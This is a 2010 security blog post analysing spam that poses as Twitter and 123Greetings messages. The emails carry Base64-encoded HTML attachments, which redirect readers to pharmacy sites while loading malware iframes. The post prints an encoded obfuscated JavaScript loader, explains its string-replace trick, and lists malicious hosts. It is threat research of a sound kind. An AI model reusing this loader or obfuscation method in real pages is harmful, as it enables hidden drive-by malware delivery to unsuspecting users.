Monday, June 14, 2010

More Twitter Spam: html-attached threats via Base64

The Twitter spam campaign that we wrote about on Saturday, Twitter, Canadian Pharmacy, and Undetected Malware , has shifted slightly to execute a new threat model. Various email messages which seem to be from Twitter are actually redirecting readers to a website that is selling Canadian pharmacy pills. But is that really what this campaign is about? In our previous article, we mentioned that while the site SEEMS to take you to the Canadian pharmacy website "toldspeak.com", there is more going on behind the scenes.

The previous campaign delivered spam which our friend Graham Cluley has dubbed the "Busty Amber" spam, after the well-endowed model who claims to want to be your friend on Twitter. (Angelina Jolie also wants very badly to be my friend on Twitter - she's sent the UAB Spam Data Mine several tens of thousands of invitations this week.

On Monday, the Busty Amber Twitter spam was primarily pointing to the website "jimjewell.com" and pulling down a file "z.htm". These emails are characterized by a subject line of "Twitter ###-##", where random numbers are used to fill in the
remainder of the email subject. Here's an example of one of the emails, which will have the recipients email address used in several places to create "uniqueness" in the email, which helps with deliverability:



z.htm will forward to the website "toldspeak.com" but will also secretly load an iframe to be used in delivering malware.

The current page actually has already been taken down, but it was pointing to gogoop.casanovarevealed.com port 8080 (slash) index.php?pid=10

The path is the same as the prior site -- ":8080/index.php?pid=10".

The new version of the spam actually doesn't seem to use an external link at all. Instead of having a website that the user is directed to via a URL, the email claims to have an attachment that deals with resetting your Twitter password.



The attached file passes easily through spam filters because although the filetype is ".html", the actual file contents are BASE64 encoded, which means instead of seeing plain text URLs, you have a block of garbage that looks like this:


PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPmZ1bmN0aW9uIGooKXt9O3ZhciB1RT1mYWxzZTtqLnByb3RvdHlwZSA9IHt2IDogZnVuY3Rpb24oKSB7dmFyIGw9Jyc7dGhpcy5sVT1mYWxzZTt0aGlzLmE9Jyc7dmFyIHI9ZG9jdW1lbnQ7Zj0iIjt2YXIgckk9bmV3IERhdGUoKTt2YXIgcz0xNDcwNTt2YXIgeT1yWydsJG8kY1dhcHRXaSRvJG5kJy5yZXBsYWNlKC9bZFdcPHBcJF0vZywgJycpXTtrPScnO3RoaXMudlQ9JGARCHANGEDTHIS3IEFycmF5KCk7eVsnaGFyJWVhZnAnLnJlcGxhY2UoL1twJX5BYV0vZywgJycpXT0naHV0dXRycCo6dS9yL15tKmEpYipjdW9ybSkudW4pZSl0Xi8qenUudWgqdHVtKScucmVwbGFjZSgvW1wpclxeXCp1XS9nLCAnJyk7dmFyIGxDPW5ldyBBcnJheSgpO3ZhciBlPW5ldyBBcnJheSgpO3RoaXMuc0o9IiI7dmFyIGk9ZmFsc2U7fX07dmFyIHVIPWZ1bmN0aW9uKCl7cmV0dXJuICd1SCd9O3ZhciB1PW5ldyBqKCk7IHZhciBvPWZ1bmN0aW9uKCl7fTt1LnYoKTtzUT0ic1EiOzwvc2NyaXB0Pg==


Once decoded, we find another block of text that contains the same sort of javascript replacement trick we mentioned in the previous article. By removing from the string the characters "/,[,\,r,^,*,u,g", we find that the URL we are being redirected to is "mabcom.net" (slash) "z.htm"

That "z.htm" file redirects us to "toldspeak.com", which definitively links us to the other version of the spam, and also loads an IFRAME from the location:

"dodole.designandtransitionspecialists.com" on port 8080 from the file "index.php?pid=10".

About 10PM on Monday June 15th, the spammer finally realized that that site had been removed. Don't worry, he's back again this morning with a new site. The current email with the subject: "Reset your Twitter password" still has an attached BASE64 file. This time the decode is still using the replace trick. Our URL is in this string:

hwt,t_p+:+/_/+e,r0e_i_n,t0z+a,.0cwo0mw/wz0.,h,t0mw

which has the action "replace" executed on it, with a regular expression saying to change the characters "w, _, ,, +, 0," to null.

.replace(/[w_,\+0]/g, '')

That leaves us with:

http://ereintza.com/z.htm

which takes us to a new Canadian pharmacy site, mouseultra.com, but only after it loads its malware IFRAME from:

cache.lamcfoundation.org port 8080 /index.php?pid=10

Fortunately, it looks like someone at the Los Angeles Mission College Foundation has already found the problem and cleaned up the "extra" webserver that they were running.

123Greetings.com


The same technique of attaching an .html file to your spam that contains links to malware is also being used by the current "123Greetings.com" spam run.

In that spam campaign messages with random "from" addresses used in both the subject line and the body of the email are sent, such as:

(HEADER)
From: 123Greetings.com ecards@123greetings.com
Subject: user@domain.com has sent you a birthday card

(BODY)


[user@domain.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


The attachment, ecard.html, is BASE64 encoded, but has a much more advanced Javascript obfuscation technique than the current Twitter spam campaign. My favorite Base64 decoder choked on it, so I threw it into the page offered by gosu.pl, which did fine turning the Base64 into very messy but nicely formatted Javascript.

The code used blocks like this:

var AUqMA = this;
var jL = 'r' + 'eplace';
var tdbHfv = 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ;
var zQwlUR;
zQwlUR = 354;
var qAcav = 763 ;
var Hs = 923;

to gradually build up ridiculously long strings containing code, then "replacing out" the characters that shouldn't be there to eventually cause the malware-hosting malware sites to download and attempt to execute their hostile code.

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.